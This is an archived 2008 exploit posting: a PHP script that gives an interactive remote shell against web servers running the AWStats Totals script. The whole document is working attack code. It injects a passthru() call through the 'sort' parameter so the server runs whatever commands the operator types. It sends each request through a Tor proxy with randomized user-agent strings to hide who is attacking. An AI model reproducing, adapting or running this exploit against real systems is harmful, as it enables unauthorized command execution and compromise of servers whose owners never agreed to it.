awstats-exec.txt
Posted on 04 September 2008
<?php /* * Remote Execution Exploit for AWStats Totals vulnerability (Interactive Shell) * * Author: Ricardo Almeida * email: ricardojba[at]aeiou[DoT]pt * * Greetz * The hacker webzine authored by Ronald van den Heetkamp for his code * * Credits: Vulnerabilities reported by Emory University. * http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt */ function wrap($url){ $ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver'); $op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX'); $agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)'; # tor or other proxy $tor = '127.0.0.1:8118'; $timeout = '300'; $ack = curl_init(); curl_setopt ($ack, CURLOPT_PROXY, $tor); curl_setopt ($ack, CURLOPT_URL, $url); curl_setopt ($ack, CURLOPT_HEADER, 1); curl_setopt ($ack, CURLOPT_USERAGENT, $agent); curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout); $syn = curl_exec($ack); $info = curl_getinfo($ack); curl_close($ack); if($info['http_code'] == '200') { return $syn; die(); } else { return "Fail! :".$info['http_code']." "; } } if ($argc != 2) { die("Usage: awtotalhack.php <host> "); } array_shift($argv); $host = $argv[0]; # Start the interactive shell while(1){ fwrite(STDOUT, "[shell:~ # "); $cmd = preg_replace('/ /','%20',trim(fgets(STDIN))); if ($cmd == "exit") {die();}; $attackurl = "http://".$host."/"."awstatstotals.php?sort=%22%5d%2epassthru%28%27".$cmd."%27%29%2eexit%28%29%2e%24a%5b%22"; echo wrap($attackurl); } ?>
